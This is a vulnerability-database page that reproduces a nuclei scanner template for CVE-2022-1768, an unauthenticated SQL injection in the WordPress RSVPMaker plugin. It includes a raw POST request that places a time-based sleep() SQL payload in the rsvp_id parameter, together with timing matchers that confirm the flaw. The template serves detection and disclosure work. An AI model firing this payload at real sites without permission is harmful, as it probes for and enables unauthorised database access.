Lucene search
K

WordPress RSVPMaker <=9.3.2 - SQL Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 32 Views

WordPress RSVPMaker <=9.3.2 - SQL Injection. Insufficient escaping and parameterization in user-supplied data in ~/rsvpmaker-email.php may lead to unauthorized admin operations

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
WordPress RSVPMaker 9.3.2 SQL Injection Vulnerability
15 Jan 202400:00
zdt
Circl
CVE-2022-1768
26 Jan 202500:00
circl
CNNVD
WordPress plugin RSVPMaker SQL注入漏洞
13 Jun 202200:00
cnnvd
CNVD
WordPress plugin RSVPMaker SQL注入漏洞
15 Jun 202200:00
cnvd
CVE
CVE-2022-1768
13 Jun 202213:08
cve
Cvelist
CVE-2022-1768 RSVPMaker <= 9.3.2 - Unauthenticated SQL Injection
13 Jun 202213:08
cvelist
NVD
CVE-2022-1768
13 Jun 202214:15
nvd
OSV
CVE-2022-1768
13 Jun 202214:15
osv
Packet Storm
WordPress RSVPMaker 9.3.2 SQL Injection
15 Jan 202400:00
packetstorm
Patchstack
WordPress RSVPMaker plugin <= 9.3.2 - Unauthenticated SQL Injection (SQLi) vulnerability
17 May 202200:00
patchstack
Rows per page
id: CVE-2022-1768

info:
  name: WordPress RSVPMaker <=9.3.2 - SQL Injection
  author: edoardottt
  severity: high
  description: |
    WordPress RSVPMaker plugin through 9.3.2 contains a SQL injection vulnerability due to insufficient escaping and parameterization on user-supplied data passed to multiple SQL queries in ~/rsvpmaker-email.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation.
  remediation: |
    Update to the latest version of the RSVPMaker plugin (9.3.3 or higher) to mitigate the SQL Injection vulnerability.
  reference:
    - https://gist.github.com/Xib3rR4dAr/441d6bb4a5b8ad4b25074a49210a02cc
    - https://wordpress.org/plugins/rsvpmaker/
    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2725322%40rsvpmaker&new=2725322%40rsvpmaker&sfp_email=&sfph_mail=
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1768
    - https://www.wordfence.com/vulnerability-advisories/#CVE-2022-1768
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-1768
    cwe-id: CWE-89
    epss-score: 0.12003
    epss-percentile: 0.95618
    cpe: cpe:2.3:a:carrcommunications:rsvpmaker:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: carrcommunications
    product: rsvpmaker
    framework: wordpress
  tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,sqli,rsvpmaker,carrcommunications,vkev,vuln

http:
  - raw:
      - |
        @timeout: 15s
        POST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        rsvp_id=(select(0)from(select(sleep(7)))a)&amount=1234&email=randomtext

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'

      - type: word
        part: body
        words:
          - '"payment_confirmation_message":'

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a004630440220317799ed9eec40263b0f4b8412699c7a46164e6addc1fbaa1c70e979b68b2a2a022035848e6594196c282b0e119c2afbd3733fa647e5fca5dea5d6e97de1dc6aec29:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 25
CVSS 3.17.5 - 9.8
EPSS0.12003
SSVC
32